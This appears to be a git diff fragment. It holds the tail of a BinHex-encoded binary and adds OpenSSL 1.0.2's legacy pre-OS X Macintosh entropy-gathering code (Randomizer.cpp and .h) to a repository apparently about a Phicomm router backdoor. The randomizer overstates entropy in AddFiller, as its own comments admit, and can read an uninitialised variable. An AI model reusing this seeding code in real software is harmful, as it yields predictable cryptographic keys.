+!!$B!!!!!!!%VU!!!"K4`FQ9Q!!N$-3!!!$F!!!!!!!%a[!!!#5C`FQ9Q!!L9f`!
+!!$J!!!!!!!%kiJ!!!3G`FQ9Q!!LI%`!!!$N!!!!!!!%lk3!!!b"`FQ9Q!!Lj$!!
+!!$S!!!!!!!%r#3!!!"4`FQ9Q!!MhR`!!!$X!!!!!!!%r(3!!!!T`FQ9Q!!M-hJ!
+!!$`!!!!!!!%r*`!!!!a`FQ9Q!!N&m!!!!$d!!!!!!!%r-`!!!!j`FQ9Q!!P[``!
+!!$i!!!!!!!%r33!!!3C`FQ9Q!!MmQ!!!!$m!!!!!!!&!4`!!!$j`FQ9Q!!MK!J!
+!!%!!!!!!!!&!K3!!!!j`FQ9Q!!LfY`!!!%%!!!!!!!&!N`!!!GT`FQ9Q!!MPM!!
+!!%)!!!!!!!&#E3!!!'*`FQ9Q!!PS+!!!!%-!!!!!!!&#c`!!!"4`FQ9Q!!MH03!
+!!%3!!!!!!!&#i`!!!!T`FQ9Q!!PH+3!!!%8!!!!!!!&#l3!!!!a`FQ9Q!!L*a3!
+!!%B!!!!!!!&#q3!!!-T`FQ9Q!!L*,!!!!%F!!!!!!!&$``!!!4K`FQ9Q!!MZ"!!
+!!%J!!!!!!!&%f`!!!+K`FQ9Q!!L@Q`!!!%N!!!!!!!&&J`!!!#j`FQ9Q!!M8&3!
+!!%S!!!!!!!&&X3!!!Ja`FQ9Q!!Lj"J!!!%X!!!!!!!&([3!!4J"YG("X!!!!!`!
+!!!!!!!!!!!'0[3!!"`"YG("c!!!!!`!!!!!!!!!!!!'8[3!!!""YG("T!!!!!`!
+!!!!!!!!!!!'8c3!!!#"YG(0X!!!!!`!!!!!!!!!!!!'8l3!!"T4YG'a[!!!!!`!
+!!!!!!!!!!!'EJ3!!"4"`FQ9Q!!N*[!!!!%`!!!!!!!'JN3!!!!K`FQ9Q!!Kq93!
+!!%d!!!!!!!'JQ3!!!"T`FQ9Q!!M+H`!!!%i!!!!!!!'JX`!!%0"`FQ9Q!!N6p!!
+!!%m!!!!!!!'aJ`!!"K4`FQ9Q!!M$+3!!!&!!!!!!!!'hP`!!#5C`FQ9Q!!L!9`!
+!!&%!!!!!!!(![3!!!3G`FQ9Q!!N`BJ!!!&)!!!!!!!("a!!!!b"`FQ9Q!!M3)3!
+!!&-!!!!!!!(%j!!!!"4`FQ9Q!!L4H3!!!&3!!!!!!!(%q!!!!!T`FQ9Q!!NR0J!
+!!&8!!!!!!!(&!J!!!!a`FQ9Q!!L'$3!!!&B!!!!!!!(&$J!!!!j`FQ9Q!!MR53!
+!!&F!!!!!!!(&(!!!!3C`FQ9Q!!PEH!!!!&J!!!!!!!(')J!!!$j`FQ9Q!!MfA3!
+!!&N!!!!!!!('B!!!!!j`FQ9Q!!N&53!!!&S!!!!!!!('EJ!!!GT`FQ9Q!!LB-`!
+!!&X!!!!!!!()5!!!!'*`FQ9Q!!L6[3!!!&`!!!!!!!()UJ!!!"4`FQ9Q!!LeT`!
+!!&d!!!!!!!()[J!!!!T`FQ9Q!!N,D`!!!&i!!!!!!!()b!!!!!a`FQ9Q!!LcY`!
+!!&m!!!!!!!()e!!!!-T`FQ9Q!!LFj`!!!'!!!!!!!!(*RJ!!!4K`FQ9Q!!N!V3!
+!!'%!!!!!!!(+YJ!!!+K`FQ9Q!!N(2!!!!')!!!!!!!(,AJ!!!#j`FQ9Q!!LQY!!
+!!'-!!!!!!!(,M!!!!Ja`FQ9Q!!M053!!!'3!!!!!!!(0Q!!!#J"YG("X!!!!"!!
+!!!!!!!!!!!(AQ!!!!3"YG("c!!!!"!!!!!!!!!!!!!(BQ!!!!""YG("T!!!!"!!
+!!!!!!!!!!!(BU!!!!#"YG(0X!!!!"!!!!!!!!!!!!!(Bb!!!!)aYG'a[!!!!"!!
+!!!!!!!!!!!(C9!!!"4"`FQ9Q!!MM#`!!!'8!!!!!!!(HC!!!!!K`FQ9Q!!M"$!!
+!!'B!!!!!!!(HE!!!!"T`FQ9Q!!MYHJ!!!'F!!!!!!!(HKJ!!%0"`FQ9Q!!MKm`!
+!!'J!!!!!!!([9J!!"K4`FQ9Q!!Nre3!!!'N!!!!!!!(eDJ!!#5C`FQ9Q!!LZ3J!
+!!'S!!!!!!!(qN!!!!!%(F(*PCJ!)KRi!!!"V!!!!!!!"rjF!!!-JF(*PCJ!)PD8
+!!!"X!!!!!!!#!VF!!!!8F(*PCJ!*0m)!!!"Y!!!!!!!#!XX!!!!+F(*PCJ!*AZd
+!!!"Z!!!!!!!#!Y8!!!!-F(*PCJ!)Vii!!!"[!!!!!!!#!Z%!!!!1F(*PCJ!*,[d
+!!!"`!!!!!!!#!Zm!!!%'F(*PCJ!*'EB!!!"a!!!!!!!#!r8!!!!qF(*PCJ!*0P8
+!!!"b!!!!!!!#"$-!!!!1F(*PCJ!*-D%!!!"c!!!!!!!#"%%!!!(DF(*PCJ!*0"i
+!!!"d!!!!!!!#"KX!!!"LF(*PCJ!)GH!!!!"e!!!!!!!#"Rd!!!!8F(*PCJ!)Q)S
+!!!"f!!!!!!!#"T%!!!!+F(*PCJ!*!Pd!!!"h!!!!!!!#"TX!!!!-F(*PCJ!)PR-
+!!!"i!!!!!!!#"UF!!!$+F(*PCJ!)TC!!!!!!H3!!!!!!!JGa!!!"'("bC@B!#-A
+9!!!!HJ!!!!!!!JL*!!!!U("bC@B!#86U!!!!H`!!!!!!!JNa!!!!,R"bC@B!#@@
+8!!!!I!!!!!!!!JPI!!!#$("bC@B!#(ep!!!!I3!!!!!!!JYV!!!&!'edF'`!!!!
+&!!!!!!!!!!!!!K"V!!!!J'edF(-!!!!&!!!!!!!!!!!!!K$V!!!!%'edF'N!!!!
+&!!!!!!!!!!!!!K$l!!!!)'edFf`!!!!&!!!!!!!!!!!!!K%E!!!!J'edE'm!!!!
+&!!!!!!!!!!!!!K'E!!!&%("bC@B!#8UQ!!!!IJ!!!!!!!KDV!!!!#("bC@B!#22
+(!!!!I`!!!!!!!KDc!!!!'R"bC@B!#3#p!!!!J!!!!!!!!KE0!!!3d("bC@B!#2`
+[!!!!J3!!!!!!!LHG!!!'&("bC@B!#1[4!!!!JJ!!!!!!!Lfa!!!)PR"bC@B!#(,
+9!!!!J`!!!!!!!MC(!!!""h"bC@B!#@rk!!!!K!!!!!!!!MG1!!!$)("bC@B!#1G
+'!!!!K3!!!!!!!MTZ!!!!&("bC@B!#128!!!!KJ!!!!!!!MU#!!!!#R"bC@B!#,1
+q!!!!K`!!!!!!!MU-!!!!$("bC@B!#)c'!!!!L!!!!!!!!MUB!!!!$R"bC@B!#4S
+,!!!!L3!!!!!!!MUQ!!!""R"bC@B!#-iX!!!!LJ!!!!!!!MZX!!!!2R"bC@B!#(C
+#!!!!L`!!!!!!!M[U!!!!$R"bC@B!#@+F!!!!M!!!!!!!!M[i!!!"fR"bC@B!#8(
+h!!!!M3!!!!!!!Mh5!!!!BR"bC@B!#2!L!!!!MJ!!!!!!!Mid!!!!&("bC@B!#(d
+@!!!!M`!!!!!!!Mj)!!!!#R"bC@B!#2iC!!!!N!!!!!!!!!)q8J!!!!a`FQ9Q!!M
+YZ!!!!*%!!!!!!!)qAJ!!!-T`FQ9Q!!Pb83!!!*)!!!!!!!)r+!!!!4K`FQ9Q!!L
+a"3!!!*-!!!!!!!*!3!!!!+K`FQ9Q!!NZf`!!!*3!!!!!!!*!k!!!!#j`FQ9Q!!K
+j[`!!!*8!!!!!!!*"&J!!!Ja`FQ9Q!!Mi,3!!!*B!!!!!!!*$)J!!#J"YG("X!!!
+!"J!!!!!!!!!!!!*0)J!!!3"YG("c!!!!"J!!!!!!!!!!!!*1)J!!!""YG("T!!!
+!"J!!!!!!!!!!!!*1-J!!!)aYG'a[!!!!"J!!!!!!!!!!!!*1[J!!!#"YG(0X!!!
+!"J!!!!!!!!!!!!*1hJ!!"4"`FQ9Q!!Kf)J!!!*F!!!!!!!*6lJ!!!!K`FQ9Q!!N
+bh`!!!*J!!!!!!!*6pJ!!!"T`FQ9Q!!MZB3!!!*N!!!!!!!*8%!!!%0"`FQ9Q!!M
+[m`!!!*S!!!!!!!*Ni!!!"K4`FQ9Q!!NVZ`!!!*X!!!!!!!*Up!!!#*C`FQ9Q!!M
+b!J!!!*`!!!!!!!*cLJ!!!3G`FQ9Q!!P083!!!*d!!!!!!!*dN3!!!b"`FQ9Q!!M
+a13!!!*i!!!!!!!*hX3!!!"4`FQ9Q!!P9h3!!!*m!!!!!!!*ha3!!!!T`FQ9Q!!M
++,3!!!+!!!!!!!!*hc`!!!!a`FQ9Q!!L6T`!!!+%!!!!!!!*hf`!!!!j`FQ9Q!!M
+jB3!!!+)!!!!!!!*hk3!!!3C`FQ9Q!!L0Z`!!!+-!!!!!!!*il`!!!$j`FQ9Q!!M
+P3J!!!+3!!!!!!!*j,3!!!!j`FQ9Q!!N6hJ!!!+8!!!!!!!*j1`!!!GT`FQ9Q!!N
+kJ`!!!+B!!!!!!!*l&3!!!'*`FQ9Q!!N&H!!!!+F!!!!!!!*lG`!!!"4`FQ9Q!!L
+,iJ!!!+J!!!!!!!*lL`!!!!T`FQ9Q!!MDI3!!!+N!!!!!!!*lP3!!!!a`FQ9Q!!K
+l33!!!+S!!!!!!!*lS3!!!-T`FQ9Q!!MlG3!!!+X!!!!!!!*mD`!!!4K`FQ9Q!!L
+e&!!!!+`!!!!!!!*pJ`!!!+K`FQ9Q!!MK1`!!!+d!!!!!!!*q+`!!!#j`FQ9Q!!L
+Y#!!!!+i!!!!!!!*q@3!!!Ja`FQ9Q!!L42`!!!+m!!!!!!!+!C3!!2!"YG("X!!!
+!"`!!!!!!!!!!!!+mC3!!"J"YG("c!!!!"`!!!!!!!!!!!!,#C3!!!""YG("T!!!
+!"`!!!!!!!!!!!!,#G3!!"G4YG'a[!!!!"`!!!!!!!!!!!!,)53!!!#"YG(0X!!!
+!"`!!!!!!!!!!!!,)D3!!"4"`FQ9Q!!NXL3!!!,!!!!!!!!,0H3!!!!K`FQ9Q!!P
+%U3!!!,%!!!!!!!,0J3!!!"T`FQ9Q!!LT(!!!!,)!!!!!!!,0Q`!!%0"`FQ9Q!!N
+(M3!!!,-!!!!!!!,HD`!!"K4`FQ9Q!!PH[`!!!,3!!!!!!!,NI`!!#5C`FQ9Q!!M
+Hh!!!!,8!!!!!!!,YT3!!!3G`FQ9Q!!M`h!!!!,B!!!!!!!,ZV!!!!b"`FQ9Q!!L
+N03!!!,F!!!!!!!,ac!!!!"4`FQ9Q!!Mb6J!!!,J!!!!!!!,ai!!!!!T`FQ9Q!!N
+a@!!!!,N!!!!!!!,akJ!!!!a`FQ9Q!!LH1J!!!,S!!!!!!!,apJ!!!!j`FQ9Q!!N
+"f3!!!,X!!!!!!!,b"!!!!3C`FQ9Q!!P`p!!!!,`!!!!!!!,c#J!!!$j`FQ9Q!!P
+Qf!!!!,d!!!!!!!,c5!!!!!j`FQ9Q!!PYDJ!!!,i!!!!!!!,c9J!!!GT`FQ9Q!!N
+#-!!!!,m!!!!!!!,e-!!!!'*`FQ9Q!!ME@!!!!-!!!!!!!!,eNJ!!!"4`FQ9Q!!L
+j4`!!!-%!!!!!!!,eTJ!!!!T`FQ9Q!!Mf$3!!!-)!!!!!!!,eX!!!!!a`FQ9Q!!M
+eDJ!!!--!!!!!!!,e[!!!!-T`FQ9Q!!MfF3!!!-3!!!!!!!,fKJ!!!4K`FQ9Q!!N
+`R`!!!-8!!!!!!!,hRJ!!!+K`FQ9Q!!LqH3!!!-B!!!!!!!,i4J!!!#j`FQ9Q!!L
+3!*S!!!$(!!!!!!!#q(3!!!)-F(*PCJ!)d'B!!!$)!!!!!!!#qS!!!$`!EA4`E!!
+!!!J!!!!!!!!!!!!$0S!!!!B!EA4`F`!!!!J!!!!!!!!!!!!$2)!!!!!3EA4`D3!
+!!!J!!!!!!!!!!!!$2*!!!!!!)'edFf`!!!!)!!!!!!!!!!!!!cb`!!!&e'edE'm
+!!!!)!!!!!!!!!!!!!d+%!!!3a'edCf`!!!2S!!!!!!!!!!!!!e0)!!!!,'e[G'N
+!!!!!!!!!!!!!!!!!!h(U!!!6J&"-Fh3!#,"V!!!!b3!!!!!!!&LS!!!#,'e`FfN
+!!!2S!!!!!!!!!!!!!fMk!!!!%'ecG(!!!!!#!!!!!!!!!!!!!fN+!!!!%'ecG(!
+!!!!&!!!!!!!!!!!!!&V8!!!!+'ecG'N!!!2S!!!!!!!!!!!!!fP#!!!!+'ecG'N
+!!!!!!!!!!!!!!!!!!&Vm!!!!$'eKE'`!!!!!!!!!!!!!!!!!!fE1!!!!a'eKF'`
+!!!!!!!!!!!!!!!$B03!!:
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/Randomizer.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/Randomizer.cpp
new file mode 100644
index 0000000..cceb6bd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/Randomizer.cpp
@@ -0,0 +1,476 @@
+/* 
+------- Strong random data generation on a Macintosh (pre - OS X) ------
+		
+--	GENERAL: We aim to generate unpredictable bits without explicit
+	user interaction. A general review of the problem may be found
+	in RFC 1750, "Randomness Recommendations for Security", and some
+	more discussion, of general and Mac-specific issues has appeared
+	in "Using and Creating Cryptographic- Quality Random Numbers" by
+	Jon Callas (www.merrymeet.com/jon/usingrandom.html).
+
+	The data and entropy estimates provided below are based on my
+	limited experimentation and estimates, rather than by any
+	rigorous study, and the entropy estimates tend to be optimistic.
+	They should not be considered absolute.
+
+	Some of the information being collected may be correlated in
+	subtle ways. That includes mouse positions, timings, and disk
+	size measurements. Some obvious correlations will be eliminated
+	by the programmer, but other, weaker ones may remain. The
+	reliability of the code depends on such correlations being
+	poorly understood, both by us and by potential interceptors.
+
+	This package has been planned to be used with OpenSSL, v. 0.9.5.
+	It requires the OpenSSL function RAND_add. 
+
+--	OTHER WORK: Some source code and other details have been
+	published elsewhere, but I haven't found any to be satisfactory
+	for the Mac per se:
+
+	* The Linux random number generator (by Theodore Ts'o, in
+	  drivers/char/random.c), is a carefully designed open-source
+	  crypto random number package. It collects data from a variety
+	  of sources, including mouse, keyboard and other interrupts.
+	  One nice feature is that it explicitly estimates the entropy
+	  of the data it collects. Some of its features (e.g. interrupt
+	  timing) cannot be reliably exported to the Mac without using
+	  undocumented APIs.
+
+	* Truerand by Don P. Mitchell and Matt Blaze uses variations
+	  between different timing mechanisms on the same system. This
+	  has not been tested on the Mac, but requires preemptive
+	  multitasking, and is hardware-dependent, and can't be relied
+	  on to work well if only one oscillator is present.
+
+	* Cryptlib's RNG for the Mac (RNDMAC.C by Peter Gutmann),
+	  gathers a lot of information about the machine and system
+	  environment. Unfortunately, much of it is constant from one
+	  startup to the next. In other words, the random seed could be
+	  the same from one day to the next. Some of the APIs are
+	  hardware-dependent, and not all are compatible with Carbon (OS
+	  X). Incidentally, the EGD library is based on the UNIX entropy
+	  gathering methods in cryptlib, and isn't suitable for MacOS
+	  either.
+
+	* Mozilla (and perhaps earlier versions of Netscape) uses the
+	  time of day (in seconds) and an uninitialized local variable
+	  to seed the random number generator. The time of day is known
+	  to an outside interceptor (to within the accuracy of the
+	  system clock). The uninitialized variable could easily be
+	  identical between subsequent launches of an application, if it
+	  is reached through the same path.
+
+	* OpenSSL provides the function RAND_screen(), by G. van
+	  Oosten, which hashes the contents of the screen to generate a
+	  seed. This is not useful for an extension or for an
+	  application which launches at startup time, since the screen
+	  is likely to look identical from one launch to the next. This
+	  method is also rather slow.
+
+	* Using variations in disk drive seek times has been proposed
+	  (Davis, Ihaka and Fenstermacher, world.std.com/~dtd/;
+	  Jakobsson, Shriver, Hillyer and Juels,
+	  www.bell-labs.com/user/shriver/random.html). These variations
+	  appear to be due to air turbulence inside the disk drive
+	  mechanism, and are very strongly unpredictable. Unfortunately
+	  this technique is slow, and some implementations of it may be
+	  patented (see Shriver's page above.) It of course cannot be
+	  used with a RAM disk.
+
+--	TIMING: On the 601 PowerPC the time base register is guaranteed
+	to change at least once every 10 addi instructions, i.e. 10
+	cycles. On a 60 MHz machine (slowest PowerPC) this translates to
+	a resolution of 1/6 usec. Newer machines seem to be using a 10
+	cycle resolution as well.
+	
+	For 68K Macs, the Microseconds() call may be used. See Develop
+	issue 29 on the Apple developer site
+	(developer.apple.com/dev/techsupport/develop/issue29/minow.html)
+	for information on its accuracy and resolution. The code below
+	has been tested only on PowerPC based machines.
+
+	The time from machine startup to the launch of an application in
+	the startup folder has a variance of about 1.6 msec on a new G4
+	machine with a defragmented and optimized disk, most extensions
+	off and no icons on the desktop. This can be reasonably taken as
+	a lower bound on the variance. Most of this variation is likely
+	due to disk seek time variability. The distribution of startup
+	times is probably not entirely even or uncorrelated. This needs
+	to be investigated, but I am guessing that it not a majpor
+	problem. Entropy = log2 (1600/0.166) ~= 13 bits on a 60 MHz
+	machine, ~16 bits for a 450 MHz machine.
+
+	User-launched application startup times will have a variance of
+	a second or more relative to machine startup time. Entropy >~22
+	bits.
+
+	Machine startup time is available with a 1-second resolution. It
+	is predictable to no better a minute or two, in the case of
+	people who show up punctually to work at the same time and
+	immediately start their computer. Using the scheduled startup
+	feature (when available) will cause the machine to start up at
+	the same time every day, making the value predictable. Entropy
+	>~7 bits, or 0 bits with scheduled startup.
+
+	The time of day is of course known to an outsider and thus has 0
+	entropy if the system clock is regularly calibrated.
+
+--	KEY TIMING: A  very fast typist (120 wpm) will have a typical
+	inter-key timing interval of 100 msec. We can assume a variance
+	of no less than 2 msec -- maybe. Do good typists have a constant
+	rhythm, like drummers? Since what we measure is not the
+	key-generated interrupt but the time at which the key event was
+	taken off the event queue, our resolution is roughly the time
+	between process switches, at best 1 tick (17 msec). I  therefore
+	consider this technique questionable and not very useful for
+	obtaining high entropy data on the Mac.
+
+--	MOUSE POSITION AND TIMING: The high bits of the mouse position
+	are far from arbitrary, since the mouse tends to stay in a few
+	limited areas of the screen. I am guessing that the position of
+	the mouse is arbitrary within a 6 pixel square. Since the mouse
+	stays still for long periods of time, it should be sampled only
+	after it was moved, to avoid correlated data. This gives an
+	entropy of log2(6*6) ~= 5 bits per measurement.
+
+	The time during which the mouse stays still can vary from zero
+	to, say, 5 seconds (occasionally longer). If the still time is
+	measured by sampling the mouse during null events, and null
+	events are received once per tick, its resolution is 1/60th of a
+	second, giving an entropy of log2 (60*5) ~= 8 bits per
+	measurement. Since the distribution of still times is uneven,
+	this estimate is on the high side.
+
+	For simplicity and compatibility across system versions, the
+	mouse is to be sampled explicitly (e.g. in the event loop),
+	rather than in a time manager task.
+
+--	STARTUP DISK TOTAL FILE SIZE: Varies typically by at least 20k
+	from one startup to the next, with 'minimal' computer use. Won't
+	vary at all if machine is started again immediately after
+	startup (unless virtual memory is on), but any application which
+	uses the web and caches information to disk is likely to cause
+	this much variation or more. The variation is probably not
+	random, but I don't know in what way. File sizes tend to be
+	divisible by 4 bytes since file format fields are often
+	long-aligned. Entropy > log2 (20000/4) ~= 12 bits.
+	
+--	STARTUP DISK FIRST AVAILABLE ALLOCATION BLOCK: As the volume
+	gets fragmented this could be anywhere in principle. In a
+	perfectly unfragmented volume this will be strongly correlated
+	with the total file size on the disk. With more fragmentation
+	comes less certainty. I took the variation in this value to be
+	1/8 of the total file size on the volume.
+
+--	SYSTEM REQUIREMENTS: The code here requires System 7.0 and above
+	(for Gestalt and Microseconds calls). All the calls used are
+	Carbon-compatible.
+*/
+
+/*------------------------------ Includes ----------------------------*/
+
+#include "Randomizer.h"
+
+// Mac OS API
+#include <Files.h>
+#include <Folders.h>
+#include <Events.h>
+#include <Processes.h>
+#include <Gestalt.h>
+#include <Resources.h>
+#include <LowMem.h>
+
+// Standard C library
+#include <stdlib.h>
+#include <math.h>
+
+/*---------------------- Function declarations -----------------------*/
+
+// declared in OpenSSL/crypto/rand/rand.h
+extern "C" void RAND_add (const void *buf, int num, double entropy);
+
+unsigned long GetPPCTimer (bool is601);	// Make it global if needed
+					// elsewhere
+
+/*---------------------------- Constants -----------------------------*/
+
+#define kMouseResolution 6		// Mouse position has to differ
+					// from the last one by this
+					// much to be entered
+#define kMousePositionEntropy 5.16	// log2 (kMouseResolution**2)
+#define kTypicalMouseIdleTicks 300.0	// I am guessing that a typical
+					// amount of time between mouse
+					// moves is 5 seconds
+#define kVolumeBytesEntropy 12.0	// about log2 (20000/4),
+					// assuming a variation of 20K
+					// in total file size and
+					// long-aligned file formats.
+#define kApplicationUpTimeEntropy 6.0	// Variance > 1 second, uptime
+					// in ticks  
+#define kSysStartupEntropy 7.0		// Entropy for machine startup
+					// time
+
+
+/*------------------------ Function definitions ----------------------*/
+
+CRandomizer::CRandomizer (void)
+{
+	long	result;
+	
+	mSupportsLargeVolumes =
+		(Gestalt(gestaltFSAttr, &result) == noErr) &&
+		((result & (1L << gestaltFSSupports2TBVols)) != 0);
+	
+	if (Gestalt (gestaltNativeCPUtype, &result) != noErr)
+	{
+		mIsPowerPC = false;
+		mIs601 = false;
+	}
+	else
+	{
+		mIs601 = (result == gestaltCPU601);
+		mIsPowerPC = (result >= gestaltCPU601);
+	}
+	mLastMouse.h = mLastMouse.v = -10;	// First mouse will
+						// always be recorded
+	mLastPeriodicTicks = TickCount();
+	GetTimeBaseResolution ();
+	
+	// Add initial entropy
+	AddTimeSinceMachineStartup ();
+	AddAbsoluteSystemStartupTime ();
+	AddStartupVolumeInfo ();
+	AddFiller ();
+}
+
+void CRandomizer::PeriodicAction (void)
+{
+	AddCurrentMouse ();
+	AddNow (0.0);	// Should have a better entropy estimate here
+	mLastPeriodicTicks = TickCount();
+}
+
+/*------------------------- Private Methods --------------------------*/
+
+void CRandomizer::AddCurrentMouse (void)
+{
+	Point mouseLoc;
+	unsigned long lastCheck;	// Ticks since mouse was last
+					// sampled
+
+#if TARGET_API_MAC_CARBON
+	GetGlobalMouse (&mouseLoc);
+#else
+	mouseLoc = LMGetMouseLocation();
+#endif
+	
+	if (labs (mLastMouse.h - mouseLoc.h) > kMouseResolution/2 &&
+	    labs (mLastMouse.v - mouseLoc.v) > kMouseResolution/2)
+		AddBytes (&mouseLoc, sizeof (mouseLoc),
+				kMousePositionEntropy);
+	
+	if (mLastMouse.h == mouseLoc.h && mLastMouse.v == mouseLoc.v)
+		mMouseStill ++;
+	else
+	{
+		double entropy;
+		
+		// Mouse has moved. Add the number of measurements for
+		// which it's been still. If the resolution is too
+		// coarse, assume the entropy is 0.
+
+		lastCheck = TickCount() - mLastPeriodicTicks;
+		if (lastCheck <= 0)
+			lastCheck = 1;
+		entropy = log2l
+			(kTypicalMouseIdleTicks/(double)lastCheck);
+		if (entropy < 0.0)
+			entropy = 0.0;
+		AddBytes (&mMouseStill, sizeof (mMouseStill), entropy);
+		mMouseStill = 0;
+	}
+	mLastMouse = mouseLoc;
+}
+
+void CRandomizer::AddAbsoluteSystemStartupTime (void)
+{
+	unsigned long	now;		// Time in seconds since
+					// 1/1/1904
+	GetDateTime (&now);
+	now -= TickCount() / 60;	// Time in ticks since machine
+					// startup
+	AddBytes (&now, sizeof (now), kSysStartupEntropy);
+}
+
+void CRandomizer::AddTimeSinceMachineStartup (void)
+{
+	AddNow (1.5);			// Uncertainty in app startup
+					// time is > 1.5 msec (for
+					// automated app startup).
+}
+
+void CRandomizer::AddAppRunningTime (void)
+{
+	ProcessSerialNumber PSN;
+	ProcessInfoRec		ProcessInfo;
+	
+	ProcessInfo.processInfoLength = sizeof (ProcessInfoRec);
+	ProcessInfo.processName = nil;
+	ProcessInfo.processAppSpec = nil;
+	
+	GetCurrentProcess (&PSN);
+	GetProcessInformation (&PSN, &ProcessInfo);
+
+	// Now add the amount of time in ticks that the current process
+	// has been active
+
+	AddBytes (&ProcessInfo, sizeof (ProcessInfoRec),
+			kApplicationUpTimeEntropy);
+}
+
+void CRandomizer::AddStartupVolumeInfo (void)
+{
+	short			vRefNum;
+	long			dirID;
+	XVolumeParam	pb;
+	OSErr			err;
+	
+	if (!mSupportsLargeVolumes)
+		return;
+		
+	FindFolder (kOnSystemDisk, kSystemFolderType, kDontCreateFolder,
+			&vRefNum, &dirID);
+	pb.ioVRefNum = vRefNum;
+	pb.ioCompletion = 0;
+	pb.ioNamePtr = 0;
+	pb.ioVolIndex = 0;
+	err = PBXGetVolInfoSync (&pb);
+	if (err != noErr)
+		return;
+		
+	// Base the entropy on the amount of space used on the disk and
+	// on the next available allocation block. A lot else might be
+	// unpredictable, so might as well toss the whole block in. See
+	// comments for entropy estimate justifications.
+
+	AddBytes (&pb, sizeof (pb),
+		kVolumeBytesEntropy +
+		log2l (((pb.ioVTotalBytes.hi - pb.ioVFreeBytes.hi)
+				* 4294967296.0D +
+			(pb.ioVTotalBytes.lo - pb.ioVFreeBytes.lo))
+				/ pb.ioVAlBlkSiz - 3.0));
+}
+
+/*
+	On a typical startup CRandomizer will come up with about 60
+	bits of good, unpredictable data. Assuming no more input will
+	be available, we'll need some more lower-quality data to give
+	OpenSSL the 128 bits of entropy it desires. AddFiller adds some
+	relatively predictable data into the soup.
+*/
+
+void CRandomizer::AddFiller (void)
+{
+	struct
+	{
+		ProcessSerialNumber psn;	// Front process serial
+						// number
+		RGBColor	hiliteRGBValue;	// User-selected
+						// highlight color
+		long		processCount;	// Number of active
+						// processes
+		long		cpuSpeed;	// Processor speed
+		long		totalMemory;	// Total logical memory
+						// (incl. virtual one)
+		long		systemVersion;	// OS version
+		short		resFile;	// Current resource file
+	} data;
+	
+	GetNextProcess ((ProcessSerialNumber*) kNoProcess);
+	while (GetNextProcess (&data.psn) == noErr)
+		data.processCount++;
+	GetFrontProcess (&data.psn);
+	LMGetHiliteRGB (&data.hiliteRGBValue);
+	Gestalt (gestaltProcClkSpeed, &data.cpuSpeed);
+	Gestalt (gestaltLogicalRAMSize, &data.totalMemory);
+	Gestalt (gestaltSystemVersion, &data.systemVersion);
+	data.resFile = CurResFile ();
+	
+	// Here we pretend to feed the PRNG completely random data. This
+	// is of course false, as much of the above data is predictable
+	// by an outsider. At this point we don't have any more
+	// randomness to add, but with OpenSSL we must have a 128 bit
+	// seed before we can start. We just add what we can, without a
+	// real entropy estimate, and hope for the best.
+
+	AddBytes (&data, sizeof(data), 8.0 * sizeof(data));
+	AddCurrentMouse ();
+	AddNow (1.0);
+}
+
+//-------------------  LOW LEVEL ---------------------
+
+void CRandomizer::AddBytes (void *data, long size, double entropy)
+{
+	RAND_add (data, size, entropy * 0.125);	// Convert entropy bits
+						// to bytes
+}
+
+void CRandomizer::AddNow (double millisecondUncertainty)
+{
+	long time = SysTimer();
+	AddBytes (&time, sizeof (time), log2l (millisecondUncertainty *
+			mTimebaseTicksPerMillisec));
+}
+
+//----------------- TIMING SUPPORT ------------------
+
+void CRandomizer::GetTimeBaseResolution (void)
+{	
+#ifdef __powerc
+	long speed;
+	
+	// gestaltProcClkSpeed available on System 7.5.2 and above
+	if (Gestalt (gestaltProcClkSpeed, &speed) != noErr)
+		// Only PowerPCs running pre-7.5.2 are 60-80 MHz
+		// machines.
+		mTimebaseTicksPerMillisec =  6000.0D;
+	// Assume 10 cycles per clock update, as in 601 spec. Seems true
+	// for later chips as well.
+	mTimebaseTicksPerMillisec = speed / 1.0e4D;
+#else
+	// 68K VIA-based machines (see Develop Magazine no. 29)
+	mTimebaseTicksPerMillisec = 783.360D;
+#endif
+}
+
+unsigned long CRandomizer::SysTimer (void)	// returns the lower 32
+						// bit of the chip timer
+{
+#ifdef __powerc
+	return GetPPCTimer (mIs601);
+#else
+	UnsignedWide usec;
+	Microseconds (&usec);
+	return usec.lo;
+#endif
+}
+
+#ifdef __powerc
+// The timebase is available through mfspr on 601, mftb on later chips.
+// Motorola recommends that an 601 implementation map mftb to mfspr
+// through an exception, but I haven't tested to see if MacOS actually
+// does this. We only sample the lower 32 bits of the timer (i.e. a
+// few minutes of resolution)
+
+asm unsigned long GetPPCTimer (register bool is601)
+{
+	cmplwi	is601, 0	// Check if 601
+	bne	_601		// if non-zero goto _601
+	mftb  	r3		// Available on 603 and later.
+	blr			// return with result in r3
+_601:
+	mfspr r3, spr5  	// Available on 601 only.
+				// blr inserted automatically
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/Randomizer.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/Randomizer.h
new file mode 100644
index 0000000..7c8b076
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/Randomizer.h
@@ -0,0 +1,42 @@
+
+// Gathers unpredictable system data to be used for generating
+// random bits
+
+#include <MacTypes.h>
+
+class CRandomizer {
+ public:
+    CRandomizer(void);
+    void PeriodicAction(void);
+
+ private:
+
+    // Private calls
+
+    void AddTimeSinceMachineStartup(void);
+    void AddAbsoluteSystemStartupTime(void);
+    void AddAppRunningTime(void);
+    void AddStartupVolumeInfo(void);
+    void AddFiller(void);
+
+    void AddCurrentMouse(void);
+    void AddNow(double millisecondUncertainty);
+    void AddBytes(void *data, long size, double entropy);
+
+    void GetTimeBaseResolution(void);
+    unsigned long SysTimer(void);
+
+    // System Info
+    bool mSupportsLargeVolumes;
+    bool mIsPowerPC;
+    bool mIs601;
+
+    // Time info
+    double mTimebaseTicksPerMillisec;
+    unsigned long mLastPeriodicTicks;
+
+    // Mouse info
+    long mSamplePeriod;
+    Point mLastMouse;
+    long mMouseStill;
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/TODO b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/TODO
new file mode 100644
index 0000000..903eb13
--- /dev/null
